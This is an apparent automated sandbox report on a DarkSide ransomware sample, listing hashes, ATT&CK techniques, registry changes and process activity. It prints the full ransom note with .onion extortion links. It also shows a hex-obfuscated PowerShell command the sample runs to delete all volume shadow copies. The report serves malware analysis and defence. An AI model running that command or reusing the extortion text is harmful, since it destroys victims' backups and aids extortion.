darkside | 4dcb5d42f6a37cb000de14de346978fa3a9f6a8cd4e41aaec3a15534cc726a1d

Analysis

max time kernel
73s
max time network
78s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
13-07-2023 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Darkside.exe
Size

59KB
MD5

cfcfb68901ffe513e9f0d76b17d02f96
SHA1

766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
SHA512

0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
SSDEEP

768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\README.75ec1c69.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (96) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Darkside.exe

pid process

3036 Darkside.exe

pid	process
3036	Darkside.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133337497344458982"	chrome.exe

Modifies registry class 5 IoCs

Processes:

Darkside.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.75ec1c69	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.75ec1c69\ = "75ec1c69"	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\75ec1c69\DefaultIcon	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\75ec1c69	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\75ec1c69\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\75ec1c69.ico"	Darkside.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exechrome.exeDarkside.exe

pid process

4144 powershell.exe
4144 powershell.exe
1140 chrome.exe
1140 chrome.exe
3036 Darkside.exe
3036 Darkside.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

1140 chrome.exe
1140 chrome.exe
1140 chrome.exe

pid	process
4144	powershell.exe
4144	powershell.exe
1140	chrome.exe
1140	chrome.exe
3036	Darkside.exe
3036	Darkside.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Darkside.exepowershell.exechrome.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	3036	Darkside.exe
Token: SeSecurityPrivilege	3036	Darkside.exe
Token: SeTakeOwnershipPrivilege	3036	Darkside.exe
Token: SeLoadDriverPrivilege	3036	Darkside.exe
Token: SeSystemProfilePrivilege	3036	Darkside.exe
Token: SeSystemtimePrivilege	3036	Darkside.exe
Token: SeProfSingleProcessPrivilege	3036	Darkside.exe
Token: SeIncBasePriorityPrivilege	3036	Darkside.exe
Token: SeCreatePagefilePrivilege	3036	Darkside.exe
Token: SeBackupPrivilege	3036	Darkside.exe
Token: SeRestorePrivilege	3036	Darkside.exe
Token: SeShutdownPrivilege	3036	Darkside.exe
Token: SeDebugPrivilege	3036	Darkside.exe
Token: SeSystemEnvironmentPrivilege	3036	Darkside.exe
Token: SeRemoteShutdownPrivilege	3036	Darkside.exe
Token: SeUndockPrivilege	3036	Darkside.exe
Token: SeManageVolumePrivilege	3036	Darkside.exe
Token: 33	3036	Darkside.exe
Token: 34	3036	Darkside.exe
Token: 35	3036	Darkside.exe
Token: 36	3036	Darkside.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeBackupPrivilege	4872	vssvc.exe
Token: SeRestorePrivilege	4872	vssvc.exe
Token: SeAuditPrivilege	4872	vssvc.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe
Token: SeCreatePagefilePrivilege	1140	chrome.exe
Token: SeShutdownPrivilege	1140	chrome.exe

Suspicious use of FindShellTrayWindow 42 IoCs

Processes:

chrome.exe

pid	process
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe

Suspicious use of SendNotifyMessage 40 IoCs

Processes:

chrome.exe

pid	process
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe
1140	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exeDarkside.exe

description	pid	process	target process
PID 1140 wrote to memory of 4788	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 4788	1140	chrome.exe	chrome.exe
PID 3036 wrote to memory of 4144	3036	Darkside.exe	powershell.exe
PID 3036 wrote to memory of 4144	3036	Darkside.exe	powershell.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 3684	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 444	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 444	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe
PID 1140 wrote to memory of 1480	1140	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Darkside.exe
"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffa9b449758,0x7ffa9b449768,0x7ffa9b449778
2⤵
PID:4788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:2
2⤵
PID:3684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:1
2⤵
PID:2400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2992 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:1
2⤵
PID:1536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:1480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4568 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:1
2⤵
PID:3188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:4044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5024 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:3328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:2620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5252 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:4852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:8
2⤵
PID:432

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4700

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4872

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
880c21cbeec4763c2329dcc899884778

SHA1
ce117bbe995d618e50d5aec8770325669b9994ad

SHA256
419f688b81c7080ee8f92fd23d0db8786ae07df431e1f60adbfc314a6e5b043a

SHA512
95ee960bbd1b822aa7ffa35bb23e374df7bdfbda1ff0d401b0c329c0af8dd8d2b6689464f66829f71829e77f012848c69e12c8b5837bad140db73a3f16bd530b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0
Filesize
44KB

MD5
e055a81367995008a256f0c8fed2b5ea

SHA1
424ffd06de01bd3b866b4db1eef14920556f59d2

SHA256
fde7dc7a10f6c01a597955d6960256ea2daf122322a0655ca2e72cc4e736d983

SHA512
ad9938ad03034083f874e3bd1dab7d1d6c0b4d2edbceb04db86deb1701d68f38819ee94b68c8ca3fbe2b77f291ebcc9bf2b5e6e049b618539688287e1c8f6b9f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1
Filesize
264KB

MD5
9afeffb063be76e6fb158931ff3736c6

SHA1
dda96152cc99162e8142cb0def669aa59c791d39

SHA256
e8a5b09a68da5b6258f7a1e6c184a356af414a37dbb0036a7ef90447f4e2f16a

SHA512
5eb7b5a1a39c4aec866e2c73c17696e048c35ad782f5adf461c7f9217f6335a8be8619d05895afc95f5ef8aa112b53c760519e84c460d1ed1d172d6823a59312

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3
Filesize
4.0MB

MD5
a912318f5e26b8eb88f3101f8428fc02

SHA1
cac121d6008bc81c976ebb3e963e95bd9c88a19b

SHA256
16d82d6f475ee6dafa0092ae8b6e32822d61dbf5e6987a0138d73910c97f292a

SHA512
72d571e9eba44cf14bfd42de0add9dfd5f314bca0da148646c55592ba468be34789c25e1c41d31b1921c18000f4665c0006de081e8f2c6c6bba00f197ce734ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
Filesize
103KB

MD5
0cb83a19972490d824dd06d1d5a1faf7

SHA1
3ca3905788ee38bb7997489c6f37b972abc43338

SHA256
d603f52764b8ad718b6554e5a08c86130cdf3d28a72b8c4912e8cf68f28738b9

SHA512
9b3b53c9a2f8a99ec5d9b1a90f31a9a39ec4b725e7b4fc33a78371a48f90c24763d5d7b918bf9131ea7b44dee3c0ff92057273a639c5b9ff363c407fb126b465

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
Filesize
37KB

MD5
25f93fe15d5e4f7f0290f150d3427454

SHA1
98ef98b2f1522199162bb0fd39d73d6beddf9aa2

SHA256
59c8dcd6763cae33b9a253100a789e48b12aa27783fd49c98701e7004a431296

SHA512
3a2dcd3530230c1667c46844d4ac75519ed8e281bb84517fa019264251fdd57c6e44557b480579f923273518c48e3dc38b9b36e7a815c43f5db9d5a9e8035757

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
Filesize
54KB

MD5
661a50756bda6ef8a634f92b43b81fdb

SHA1
9f22cb3fddb22933bd6b1a9affaff57646105cd6

SHA256
9ce18e60b8c9a312d4a2064a8f2c1b1fa6cd5c3ea260bf0617266755115d4058

SHA512
3fa412dea07401ab30453fdf0303ecce7e876b7ac269c7ecb77fb7b79219f2ece82b4ea84e5c9975de507e1596edef05a34fa95157d6e7e65799c7a94fcf5e0b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
Filesize
317B

MD5
5b6f7fb1e5f5a3b70cf4d490e2814fd2

SHA1
3b5f1476b73c5f79a19d6f82d45ff5d14fecee4c

SHA256
4ab57476449cde671fefcbe4672c4c5809f89426b89240c53a9af90705de98b3

SHA512
c268f11f1bebcb835ec5b061cb94d5a4b4f01d546e0b78876e31605ed9ebe2f09f0fade1cbd663194041abf7791e941eb7acb23096c96baa5a7eb30deaa1aa65

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Filesize
332B

MD5
579a559edb867de1ed83a6b21d651b41

SHA1
5e888aad274edca845b3d6e60bf403fa8d2b0cf0

SHA256
ef4e2d25ce73488d613bf57ed51af49ba5989c6a8d767ff7689418ac87d9cf9b

SHA512
b89a16c8f29c788f0de30c1c25490523a2c517bdb2ffaeb4ee46328c70eb9fb4d4776c088974aeb338ac3597f3bac5742082820da8302675ddb174318251ea90

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
371B

MD5
bf8f4b827af70fccb96567d705734258

SHA1
5e632cf9980322ebbd42b3a5f845a25c3c9efb82

SHA256
9bae1af0dab8f3059fa227be437b65a058cf05108f1475b75e3490ef2b27c63c

SHA512
99bae16d788aa896b970e74f1f4af0e0ffc8deeb24b22c648f57569593f828ad64a565ace5fd650bcd88460cd1782b39e0775fe19591411a453550739259f3cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
d94f0c765c4e512ec30c6e9c68674290

SHA1
1decb04a012cbccacfe384a8e3803dd97f240ae4

SHA256
2f65ecbc065cb2c9128fb83e40f8580f3db0b1fc044f7ada1bd4f21dbb5017bc

SHA512
c7741fc1a429c37f00963193959b6841fb481c15b0cab17adfa6486b174b1b0768357b39d71152773caa4840aa692bd38280395b2dd2a800bfa1fd489a18a51b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
23ee79834ce12c10c687db6f79d3c0e6

SHA1
f7e30f81964fb5b6da880cb0e6039da5bd06e0c3

SHA256
60330083042c2bd1dabaaa57b821688ae55778a5b10f156a2b99ceeb39726eb9

SHA512
